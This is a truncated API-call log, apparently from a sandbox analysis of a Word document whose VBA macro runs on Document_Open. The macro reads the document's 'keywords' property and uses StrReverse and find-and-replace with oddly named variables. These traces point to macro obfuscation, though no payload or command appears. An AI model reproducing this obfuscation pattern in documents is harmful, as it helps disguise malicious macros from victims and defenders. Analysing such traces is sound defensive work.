returned 0xffffffff [0111.538] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fb34a, dwSize=0xc) returned 1 [0111.538] VirtualProtect (in: lpAddress=0xf1fb34a, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1976b4 | out: lpflOldProtect=0x1976b4*=0x40) returned 1 [0111.541] GetAsyncKeyState (vKey=3) returned 0 [0111.541] CRetailMalloc_Alloc () returned 0xf1d1c98 [0111.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1102275e, cbMultiByte=15, lpWideCharStr=0x1974e4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0111.544] CRetailMalloc_Realloc () returned 0xf13c210 [0111.544] realloc (_Block=0x0, _Size=0x20) returned 0xd0156c8 [0111.544] realloc (_Block=0x0, _Size=0x60) returned 0xd0156f0 [0111.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf0b2364, cbMultiByte=8, lpWideCharStr=0x11180460, cchWideChar=18 | out: lpWideCharStr="keywords") returned 8 [0111.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2722, cbMultiByte=26, lpWideCharStr=0x19751c, cchWideChar=27 | out: lpWideCharStr="BuiltInDocumentProperties") returned 26 [0111.545] CRetailMalloc_Realloc () returned 0xf1f1400 [0111.545] CRetailMalloc_Realloc () returned 0xf1cdd18 [0111.545] CRetailMalloc_Realloc () returned 0xf199320 [0111.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee275a, cbMultiByte=7, lpWideCharStr=0x1972f8, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0111.545] CRetailMalloc_Realloc () returned 0xf1fdbf0 [0111.545] wcscpy_s (in: _Destination=0xf1fd838, _SizeInWords=0x6, _Source="Value" | out: _Destination="Value") returned 0x0 [0111.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1102278a, cbMultiByte=14, lpWideCharStr=0x1974e4, cchWideChar=15 | out: lpWideCharStr="girlKarolGirl") returned 14 [0111.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee26f6, cbMultiByte=14, lpWideCharStr=0x197544, cchWideChar=15 | out: lpWideCharStr="girlKarolGirl") returned 14 [0111.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee26f6, cbMultiByte=14, lpWideCharStr=0x197544, cchWideChar=15 | out: lpWideCharStr="girlKarolGirl") returned 14 [0111.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee26f6, cbMultiByte=14, lpWideCharStr=0x197544, cchWideChar=15 | out: lpWideCharStr="girlKarolGirl") returned 14 [0111.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee26f6, cbMultiByte=14, lpWideCharStr=0x197544, cchWideChar=15 | out: lpWideCharStr="girlKarolGirl") returned 14 [0111.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee26f6, cbMultiByte=14, lpWideCharStr=0x197544, cchWideChar=15 | out: lpWideCharStr="girlKarolGirl") returned 14 [0111.546] CRetailMalloc_Alloc () returned 0xb953590 [0111.546] _mbscpy_s (in: _Dst=0xb953590, _DstSizeInBytes=0xe, _Src=0x10ee26f6 | out: _Dst=0xb953590) returned 0x0 [0111.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2b32, cbMultiByte=21, lpWideCharStr=0x197554, cchWideChar=22 | out: lpWideCharStr="_B_var_girlKarolGirl") returned 21 [0111.547] _mbscpy_s (in: _Dst=0x1975bc, _DstSizeInBytes=0xe, _Src=0x10ee26f6 | out: _Dst=0x1975bc) returned 0x0 [0111.547] CRetailMalloc_Free () returned 0x1 [0111.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110227b6, cbMultiByte=11, lpWideCharStr=0x1974e4, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0111.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee277e, cbMultiByte=11, lpWideCharStr=0x197544, cchWideChar=12 | out: lpWideCharStr="StrReverse") returned 11 [0111.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf0b239c, cbMultiByte=2, lpWideCharStr=0x111810ae, cchWideChar=6 | out: lpWideCharStr="$1") returned 2 [0111.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110227de, cbMultiByte=12, lpWideCharStr=0x1974e4, cchWideChar=13 | out: lpWideCharStr="dowKarolYou") returned 12 [0111.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2862, cbMultiByte=12, lpWideCharStr=0x197544, cchWideChar=13 | out: lpWideCharStr="dowKarolYou") returned 12 [0111.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2862, cbMultiByte=12, lpWideCharStr=0x197544, cchWideChar=13 | out: lpWideCharStr="dowKarolYou") returned 12 [0111.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2862, cbMultiByte=12, lpWideCharStr=0x197544, cchWideChar=13 | out: lpWideCharStr="dowKarolYou") returned 12 [0111.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2862, cbMultiByte=12, lpWideCharStr=0x197544, cchWideChar=13 | out: lpWideCharStr="dowKarolYou") returned 12 [0111.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2862, cbMultiByte=12, lpWideCharStr=0x197544, cchWideChar=13 | out: lpWideCharStr="dowKarolYou") returned 12 [0111.549] CRetailMalloc_Alloc () returned 0xb953770 [0111.549] _mbscpy_s (in: _Dst=0xb953770, _DstSizeInBytes=0xc, _Src=0x10ee2862 | out: _Dst=0xb953770) returned 0x0 [0111.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2b66, cbMultiByte=19, lpWideCharStr=0x197554, cchWideChar=20 | out: lpWideCharStr="_B_var_dowKarolYou") returned 19 [0111.550] _mbscpy_s (in: _Dst=0x1975bc, _DstSizeInBytes=0xc, _Src=0x10ee2862 | out: _Dst=0x1975bc) returned 0x0 [0111.550] CRetailMalloc_Free () returned 0x1 [0111.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11022806, cbMultiByte=13, lpWideCharStr=0x1974e4, cchWideChar=14 | out: lpWideCharStr="wdReplaceAll") returned 13 [0111.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee28ae, cbMultiByte=13, lpWideCharStr=0x197544, cchWideChar=14 | out: lpWideCharStr="wdReplaceAll") returned 13 [0111.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee28ae, cbMultiByte=13, lpWideCharStr=0x197544, cchWideChar=14 | out: lpWideCharStr="wdReplaceAll") returned 13 [0111.551] CRetailMalloc_Realloc () returned 0xf1391e0 [0111.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee27a6, cbMultiByte=8, lpWideCharStr=0x19751c, cchWideChar=9 | out: lpWideCharStr="Content") returned 8 [0111.554] CRetailMalloc_Alloc () returned 0xb8863f0 [0111.554] CRetailMalloc_Realloc () returned 0xf0bac10 [0111.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee27ca, cbMultiByte=5, lpWideCharStr=0x19751c, cchWideChar=6 | out: lpWideCharStr="Find") returned 5 [0111.556] CRetailMalloc_Alloc () returned 0xb8869f0 [0111.556] CRetailMalloc_Realloc () returned 0xb9e6e30 [0111.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee27ee, cbMultiByte=8, lpWideCharStr=0x19751c, cchWideChar=9 | out: lpWideCharStr="Execute") returned 8 [0111.557] CRetailMalloc_Alloc () returned 0xf102fd8 [0111.557] _mbscpy_s (in: _Dst=0xf102fd8, _DstSizeInBytes=0x9, _Src=0x10ee2812 | out: _Dst=0xf102fd8) returned 0x0 [0111.557] SysStringByteLen (bstr="FindText") returned 0x10 [0111.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindText", cchWideChar=8, lpMultiByteStr=0x197440, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FindTextdt\x19", lpUsedDefaultChar=0x0) returned 8 [0111.557] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FindText", cchCount1=-1, lpString2="FindText", cchCount2=-1) returned 2 [0111.557] CRetailMalloc_Free () returned 0x1 [0111.557] CRetailMalloc_Alloc () returned 0xf102fd8 [0111.557] _mbscpy_s (in: _Dst=0xf102fd8, _DstSizeInBytes=0xc, _Src=0x10ee283a | out: _Dst=0xf102fd8) returned 0x0 [0111.557] SysStringByteLen (bstr="FindText") returned 0x10 [0111.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindText", cchWideChar=8, lpMultiByteStr=0x197440, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FindTextdt\x19", lpUsedDefaultChar=0x0) returned 8 [0111.557] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FindText", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1 [0111.557] SysStringByteLen (bstr="MatchCase") returned 0x12 [0111.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchCase", cchWideChar=9, lpMultiByteStr=0x197440, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchCaset\x19", lpUsedDefaultChar=0x0) returned 9 [0111.557] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchCase", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1 [0111.558] SysStringByteLen (bstr="MatchWholeWord") returned 0x1c [0111.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchWholeWord", cchWideChar=14, lpMultiByteStr=0x197430, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchWholeWordñ½\x10\x05", lpUsedDefaultChar=0x0) returned 14 [0111.558] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchWholeWord", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1 [0111.558] SysStringByteLen (bstr="MatchWildcards") returned 0x1c [0111.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchWildcards", cchWideChar=14, lpMultiByteStr=0x197430, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchWildcardsñ½\x10\x05", lpUsedDefaultChar=0x0) returned 14 [0111.558] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchWildcards", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1 [0111.558] SysStringByteLen (bstr="MatchSoundsLike") returned 0x1e [0111.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchSoundsLike", cchWideChar=15, lpMultiByteStr=0x197430, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchSoundsLike½\x10\x05", lpUsedDefaultChar=0x0) returned 15 [0111.558] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchSoundsLike", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1 [0111.558] SysStringByteLen (bstr="MatchAllWordForms") returned 0x22 [0111.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchAllWordForms", cchWideChar=17, lpMultiByteStr=0x197430, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchAllWordForms\x05", lpUsedDefaultChar=0x0) returned 17 [0111.558] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchAllWordForms", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1 [0111.558] SysStringByteLen (bstr="Forward") returned 0xe [0111.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Forward", cchWideChar=7, lpMultiByteStr=0x197440, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Forwardfdt\x19", lpUsedDefaultChar=0x0) returned 7 [0111.558] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Forward", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1 [0111.558] SysStringByteLen (bstr="Wrap") returned 0x8 [0111.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wrap", cchWideChar=4, lpMultiByteStr=0x197440, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wrap§Ä", lpUsedDefaultChar=0x0) returned 4 [0111.558] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Wrap", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 3 [0111.558] SysStringByteLen (bstr="Format") returned 0xc [0111.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Format", cchWideChar=6, lpMultiByteStr=0x197440, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Format", lpUsedDefaultChar=0x0) returned 6 [0111.558] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Format", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 1 [0111.558] SysStringByteLen (bstr="ReplaceWith") returned 0x16 [0111.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ReplaceWith", cchWideChar=11, lpMultiByteStr=0x197430, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReplaceWith", lpUsedDefaultChar=0x0) returned 11 [0111.558] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ReplaceWith", cchCount1=-1, lpString2="ReplaceWith", cchCount2=-1) returned 2 [0111.559] CRetailMalloc_Free () returned 0x1 [0111.559] CRetailMalloc_Alloc () returned 0xbab7168 [0111.559] _mbscpy_s (in: _Dst=0xbab7168, _DstSizeInBytes=0x8, _Src=0x10ee288a | out: _Dst=0xbab7168) returned 0x0 [0111.559] SysStringByteLen (bstr="FindText") returned 0x10 [0111.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindText", cchWideChar=8, lpMultiByteStr=0x197440, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FindTextdt\x19", lpUsedDefaultChar=0x0) returned 8 [0111.559] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FindText", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1 [0111.559] SysStringByteLen (bstr="MatchCase") returned 0x12 [0111.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchCase", cchWideChar=9, lpMultiByteStr=0x197440, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchCaset\x19", lpUsedDefaultChar=0x0) returned 9 [0111.559] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchCase", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1 [0111.559] SysStringByteLen (bstr="MatchWholeWord") returned 0x1c [0111.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchWholeWord", cchWideChar=14, lpMultiByteStr=0x197430, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchWholeWordñ½\x10\x05", lpUsedDefaultChar=0x0) returned 14 [0111.559] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchWholeWord", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1 [0111.559] SysStringByteLen (bstr="MatchWildcards") returned 0x1c [0111.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchWildcards", cchWideChar=14, lpMultiByteStr=0x197430, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchWildcardsñ½\x10\x05", lpUsedDefaultChar=0x0) returned 14 [0111.559] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchWildcards", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1 [0111.559] SysStringByteLen (bstr="MatchSoundsLike") returned 0x1e [0111.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchSoundsLike", cchWideChar=15, lpMultiByteStr=0x197430, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchSoundsLike½\x10\x05", lpUsedDefaultChar=0x0) returned 15 [0111.561] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchSoundsLike", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1 [0111.561] SysStringByteLen (bstr="MatchAllWordForms") returned 0x22 [0111.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MatchAllWordForms", cchWideChar=17, lpMultiByteStr=0x197430, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MatchAllWordForms\x05", lpUsedDefaultChar=0x0) returned 17 [0111.561] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="MatchAllWordForms", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1 [0111.561] SysStringByteLen (bstr="Forward") returned 0xe [0111.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Forward", cchWideChar=7, lpMultiByteStr=0x197440, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Forwardfdt\x19", lpUsedDefaultChar=0x0) returned 7 [0111.561] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Forward", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1 [0111.561] SysStringByteLen (bstr="Wrap") returned 0x8 [0111.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Wrap", cchWideChar=4, lpMultiByteStr=0x197440, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wrap§Ä", lpUsedDefaultChar=0x0) returned 4 [0111.561] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Wrap", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 3 [0111.561] SysStringByteLen (bstr="Format") returned 0xc [0111.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Format", cchWideChar=6, lpMultiByteStr=0x197440, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Format", lpUsedDefaultChar=0x0) returned 6 [0111.561] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Format", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 1 [0111.561] SysStringByteLen (bstr="ReplaceWith") returned 0x16 [0111.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ReplaceWith", cchWideChar=11, lpMultiByteStr=0x197430, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReplaceWith", lpUsedDefaultChar=0x0) returned 11 [0111.561] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ReplaceWith", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 3 [0111.561] SysStringByteLen (bstr="Replace") returned 0xe [0111.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Replace", cchWideChar=7, lpMultiByteStr=0x197440, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Replacefdt\x19", lpUsedDefaultChar=0x0) returned 7 [0111.561] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Replace", cchCount1=-1, lpString2="Replace", cchCount2=-1) returned 2 [0111.562] CRetailMalloc_Free () returned 0x1 [0111.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x661eded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0111.565] CRetailMalloc_Realloc () returned 0xf1fd9c8 [0111.566] CRetailMalloc_Realloc () returned 0xf1d1c98 [0111.566] CRetailMalloc_Free () returned 0x1 [0111.566] GetCurrentProcess () returned 0xffffffff [0111.566] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa69c, dwSize=0x14) returned 1 [0111.566] VirtualProtect (in: lpAddress=0xf1fa69c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19740c | out: lpflOldProtect=0x19740c*=0x40) returned 1 [0111.567] GetCurrentProcess () returned 0xffffffff [0111.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa69d, dwSize=0x2) returned 1 [0111.567] GetCurrentProcess () returned 0xffffffff [0111.567] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6bc, dwSize=0x14) returned 1 [0111.567] VirtualProtect (in: lpAddress=0xf1fa6bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19740c | out: lpflOldProtect=0x19740c*=0x40) returned 1 [0111.568] GetCurrentProcess () returned 0xffffffff [0111.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6bd, dwSize=0x2) returned 1 [0111.568] GetCurrentProcess () returned 0xffffffff [0111.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6dc, dwSize=0x14) returned 1 [0111.568] VirtualProtect (in: lpAddress=0xf1fa6dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19740c | out: lpflOldProtect=0x19740c*=0x40) returned 1 [0111.568] GetCurrentProcess () returned 0xffffffff [0111.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6dd, dwSize=0x2) returned 1 [0111.568] SetErrorMode (uMode=0x8001) returned 0x8001 [0111.570] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0111.570] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x65fb0000 [0111.570] SetErrorMode (uMode=0x8001) returned 0x8001 [0111.571] GetProcAddress (hModule=0x65fb0000, lpProcName=0x2c9) returned 0x661bfe55 [0111.572] GetAsyncKeyState (vKey=3) returned 0 [0111.592] GetAsyncKeyState (vKey=3) returned 0 [0112.075] GetAsyncKeyState (vKey=3) returned 0 [0116.785] GetAsyncKeyState (vKey=3) returned 0 [0116.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="New", cchWideChar=4, lpMultiByteStr=0x18adf8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="New", lpUsedDefaultChar=0x0) returned 4 [0116.910] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0xd, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.910] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x4, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Open", cchWideChar=5, lpMultiByteStr=0x18adf8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Open", lpUsedDefaultChar=0x0) returned 5 [0116.911] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0xe, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.911] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x5, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.911] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="document_open", cchCount1=-1, lpString2="Document_Open", cchCount2=-1) returned 2 [0116.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Close", cchWideChar=6, lpMultiByteStr=0x18adf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Close", lpUsedDefaultChar=0x0) returned 6 [0116.911] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0xf, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.911] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x6, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sync", cchWideChar=5, lpMultiByteStr=0x18adf8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sync", lpUsedDefaultChar=0x0) returned 5 [0116.912] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0xe, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.912] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x5, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XMLAfterInsert", cchWideChar=15, lpMultiByteStr=0x18adf8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XMLAfterInsert", lpUsedDefaultChar=0x0) returned 15 [0116.912] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0x18, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.912] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0xf, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XMLBeforeDelete", cchWideChar=16, lpMultiByteStr=0x18adf8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XMLBeforeDelete", lpUsedDefaultChar=0x0) returned 16 [0116.912] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0x19, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.912] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x10, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlAfterAdd", cchWideChar=23, lpMultiByteStr=0x18adf8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlAfterAdd", lpUsedDefaultChar=0x0) returned 23 [0116.913] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0x20, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.913] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x17, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlBeforeDelete", cchWideChar=27, lpMultiByteStr=0x18adf8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlBeforeDelete", lpUsedDefaultChar=0x0) returned 27 [0116.913] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0x24, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.913] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x1b, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlOnExit", cchWideChar=21, lpMultiByteStr=0x18adf8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContentControlOnExit", lpUsedDefaultChar=0x0) returned 21 [0116.913] _mbscpy_s (in: _Dst=0x18ad00, _DstSizeInBytes=0x1e, _Src=0x10ee2ada | out: _Dst=0x18ad00) returned 0x0 [0116.913] _mbscpy_s (in: _Dst=0x18ad09, _DstSizeInBytes=0x15, _Src=0x18adf8 | out: _Dst=0x18ad09) returned 0x0 [0116.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ContentControlOnEnter", cchWideChar=22, 